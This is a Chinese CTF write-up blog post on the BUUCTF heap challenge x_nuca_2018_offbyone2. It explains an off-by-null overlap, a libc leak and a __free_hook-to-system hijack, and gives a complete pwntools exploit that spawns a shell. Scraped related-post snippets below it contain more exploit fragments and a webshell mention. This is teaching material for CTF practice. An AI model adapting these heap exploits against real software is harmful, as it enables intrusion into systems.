BUUCTF:【x_nuca_2018_offbyone2】(off by null)

最新推荐文章于 2023-03-31 10:22:14 发布
最新推荐文章于 2023-03-31 10:22:14 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: buuctf刷题 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/122343432
版权
本文详细介绍了如何利用C语言程序中的Off-by-null漏洞,通过精心设计的堆块布局,修改堆内存状态,实现堆块重叠,进一步泄露libc地址并劫持free钩子为system,最终获取系统的shell。整个过程包括堆块分配、释放、溢出修改内存、泄露libc基址、二次堆块操作和触发system调用的步骤。
摘要由CSDN通过智能技术生成

在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些

例行检查:

程序为64位,且保护机制全开。

漏洞分析:

add()函数输入内容时,会在输入后多添加一个'\x00'字节,导致溢出一个'\x00'字节。

我们可以利用此漏洞来构造overlap,进而进行攻击。

利用思路和分析:

1.首先利用off by null 构造overlap,泄露libc地址

2.劫持free为system,free掉堆块中含有'/bin/sh'字符串时get shell

先进行堆块布局,通过bby null 漏洞去修改pre_inuse位为0,free后引起向上合并。

add(0x420,'AAAA')#释放后能进入unsortedbin中
add(0x88,'AAAA')
add(0xf8,'AAAA')

for i in range(7):        
	add(0xf0,'A')

for i in range(7):       //将0x100的tcachebin填满,导致再次free后申请的0xf0的堆块能向上合并
	free(i+3)

free(0)
free(1)
add(0x88,'A'*0x80 + p64(0x4c0))#再次将1号申请出来,利用 by null 改掉pre_inuse位,
free(2)#释放掉后引发向上合并
add(0x420,'A')#在把0号堆块申请出来,残留main_arena指针
show(0)

改掉pre_inuse前的堆:

改掉后:

 通过溢出改掉了pre_inuse位,free掉蓝色堆块后,就会形成overlap。

残留指针,通过show(),得到libc地址。

再次进行布局,劫持指针到free_hook,在将free_hook改成system,即可

add(0x180,'AA')

add(0x420,'B')#3    //再次构造堆块重叠,有大佬应该有更简单的方法,这里我感觉这几步有点麻烦了
add(0x88,'B')#4
add(0x1f8,'B')#5    //大家可以申请0x4f8的堆块,之后应该会省去下边的for循环

for i in range(7):   //和上一个循环目的一样,为了填满0x200的tcachesbin
	add(0x1f0,'AA')

for i in range(7):
	free(i+6)

free(3)
free(4)

add(0x88,'A'*0x80 + p64(0x4c0))
free(5)       //引发向上合并
free(3)
add(0x4b0,'A'*0x420 + p64(0) + p64(0x90) + p64(free_hook))  //劫持到free_hook指针

add(0x80,'/bin/sh\x00')   //此处可以将'/bin/sh'写入任意堆块中
add(0x80,p64(system))

free(4)

 此处可以看到,free_hook已经被改成了system,在次free会调用system,从而get shell.

完整exp:

from pwn import *
context.log_level='debug'
io = remote('node4.buuoj.cn',27238)
elf=ELF('./X-nuca_2018_offbyone2')
libc=ELF('./libc-2.27.so')

def choice(c):
	io.recvuntil(">>")
	io.sendline(str(c))

def add(size,content):
	choice(1)
	io.recvuntil(":")
	io.sendline(str(size))
	io.recvuntil(":")
	io.sendline(content)

def free(index):
	choice(2)
	io.recvuntil(":")
	io.sendline(str(index))

def show(index):
	choice(3)
	io.recvuntil(":")
	io.sendline(str(index))


add(0x420,'AAAA')
add(0x88,'AAAA')
add(0xf8,'AAAA')

for i in range(7):
	add(0xf0,'A')

for i in range(7):
	free(i+3)

free(0)
free(1)

add(0x88,'A'*0x80 + p64(0x4c0))
free(2)
add(0x420,'A')
show(0)

leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - 0x3ebca0
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(free_hook))
success(hex(leak))
success(hex(libc_base))
success(hex(system))

add(0x180,'AA')

add(0x420,'B')#3
add(0x88,'B')#4
add(0x1f8,'B')#5

for i in range(7):
	add(0x1f0,'AA')

for i in range(7):
	free(i+6)

free(3)
free(4)

add(0x88,'A'*0x80 + p64(0x4c0))
free(5)
free(3)
add(0x4b0,'A'*0x420 + p64(0) + p64(0x90) + p64(free_hook))

add(0x80,'/bin/sh\x00')
add(0x80,p64(system))
gdb.attach(io)
free(4)

io.interactive()

 flag到手!!

BUUCTF之off by one漏洞
weixin_45441024的博客
05-21 510
BUUCTF npuctf_2020_easyheap 首先分析一下这个程序,PIE关闭,说明可以修改got表 大概看一下程序的执行机制 堆题常见菜单结构 def add(size,content): p.sendlineafter('Your choice :',str(1)) p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size)) p.sendlineafter('Content:',content) def edit(
2017X-NUCA WEB专题赛前指导 writeup
pythonniu的博客
08-16 2521
前言今年的题目基于去年的题目新增了几道题 最安全的笔记管理系统 -做不出 Document-getshell-找不到flag 题目捉迷藏思路 点击index,flag一闪而过,简单粗暴点直接查看源码获得flagview-source:http://218.76.35.75:20111/Index.php <html> <head> <title>HT-CTF-2016
X-nuca_2018_offbyone2
doudoudedi
02-11 501
思路 off by null构造堆重叠然这里的堆块个数充足直接打2次第一次leak libc基址 再次布置好堆块然后打free_hook拿到shell exp: from pwn import * #p=process('./X-nuca_2018_offbyone2') p=remote('node3.buuoj.cn',28262) elf=ELF('./X-nuca_2018_offbyo...
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3231
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
off by null 小结
qq_43409582的博客
11-20 3459
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
starctf2018_note(栈上的null off by one)
seaaseesa的博客
07-25 627
starctf2018_note(栈上的null off by one) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在add函数里的scanf(“%256s”,&s)存在null off by one,其结果是将在栈里的rbp值低1字节覆盖为0。 将栈里rbp的值低1字节覆盖为0后,其结果导致main函数的rbp上移,这样,我们就可以在add里的可控缓冲区里控制main函数里scanf的格式化字符串指针,我们将其修改为%236s的地址,这样就能在main函数里进行栈溢出
2018X-NUCA的unconditional_security题
03-22
2018X-NUCA比赛的密码题,unconditional_security题目的源码
python args keargs_Python metrics.silhouette_score方法代码示例
weixin_39637386的博客
12-10 1462
本文整理汇总了Python中sklearn.metrics.silhouette_score方法的典型用法代码示例。如果您正苦于以下问题:Python metrics.silhouette_score方法的具体用法?Python metrics.silhouette_score怎么用?Python metrics.silhouette_score使用的例子?那么恭喜您, 这里精选的方法代码示例或许...
X‘NUCA高校联赛——unravelmfc
weixin_46520377的博客
11-12 386
文章目录REunravelmfc解题思路:总结与反思附录reference RE unravelmfc 题目提示:烦人的windows底层api 解题思路: 打开程序,发现确定按钮不能点击 用Resources Hacker改变空间属性以后重新打开,发现确定按钮仍然无法打开 查找关键api,EnableWindow// hWnd:被允许/禁止的窗口句柄 // bEnable:1 允许,0 禁止 BOOL EnableWindow(HWND hWnd,BOOL bEnable) 发现程序中多处调用En
众核处理器cache一致性研究综述_韩立敏1
08-03
NUCA结构中,每个核心的Cache距离内存的距离不一,这会增加一致性协议的复杂性,因为它需要处理不同核心之间的数据传输延迟。 文章还对传统的目录一致性协议进行了分析和比较,如MSI(Modified、Shared、Invalid...
2018X-NUCA的unconditional_security
qq_39508127的博客
03-22 286
2018X-NUCA的unconditional_security 这是一道关于量子密码的题,本人比较小白官方writeup,并没有看懂,望有大神指点一下。 附件删除文件后缀,在linux里运行即可。 ...
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1382
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 361
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
pwn 堆入门之off by one
清霂的博客
04-18 257
目录Asis CTF 2016 b00ks Asis CTF 2016 b00ks #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "b00ks" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) menu_addr=0x0000000000000A89 free_got
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1144
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
BUUCTF 2018 在线工具
最新发布
yueyi17的博客
03-31 100
代码审计发现escapeshellarg escapeshellcmd 两个函数具体不是很懂但是大概了解的是这两个函数会产生一个漏洞具体可看。PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org)这篇文章。然后试着写入一句话木马传参。发现传输成功然后用蚁剑连接。
[XNUCA2018]Warmup(考点:流量包文件提取,RSA共模攻击)
MikeCoke的博客
02-18 700
题目: from Crypto.Util.number import bytes_to_long, getPrime from random import randint from gmpy2 import powmod import sys p = getPrime(1024) q = getPrime(1024) N = p*q Phi = (p-1)*(q-1) with open("flag", 'r') as fr: flag = bytes_to_long(fr.read().strip(
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2151
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 5187
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值